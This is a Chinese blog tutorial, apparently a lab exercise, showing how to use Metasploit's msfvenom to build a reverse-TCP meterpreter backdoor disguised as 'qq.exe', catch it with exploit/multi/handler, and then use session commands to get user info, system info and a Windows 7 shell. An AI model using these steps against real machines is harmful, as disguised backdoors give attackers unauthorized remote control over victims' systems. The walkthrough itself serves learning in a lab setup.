码迷,mamicode.com
首页 > 系统相关 > 详细

msf生成后门拿shell

时间:2019-05-24 11:09:13      阅读:369      评论:0      收藏:0      [点我收藏+]

标签:mil   查看   nbsp   win7   jobs   sys   hand   height   pre   

 

0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧

kali 172.18.5.118

靶机  172.18.5.240

先尝试能不能ping通

技术图片

好的可以 那我们进行下一步

0X01爱之初体验

先在kali终端输入msfvenom -l,打开payload目录

技术图片

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe

技术图片

 

 然后将生成的qq.exe移到靶机然后打开msfconsole

 使用该攻击模块监听 use exploit/multi/handler

然后设置payload

技术图片

 

 

 在show options 发现还有未设置的

技术图片

设置LHOSTkali地址

技术图片

然后run开始监听

技术图片

 

 

这时我们打开靶机qq.exe文件就能看到Kali这边获取到一个Session

技术图片

输入jobs退出继续输入sessions -l查看session列表

技术图片

这里有一个session列表,sessionid1

我们输入sessions -i 1,与该session交互

技术图片

输入getuid查看用户信息

技术图片

输入systinfo获取系统信息

技术图片

输入shell即可获取win7shell

技术图片

不过用这样方式拿的shell普遍都是很低的,还需提权

 

msf生成后门拿shell

标签:mil   查看   nbsp   win7   jobs   sys   hand   height   pre   

原文地址:https://www.cnblogs.com/-zhong/p/10916483.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!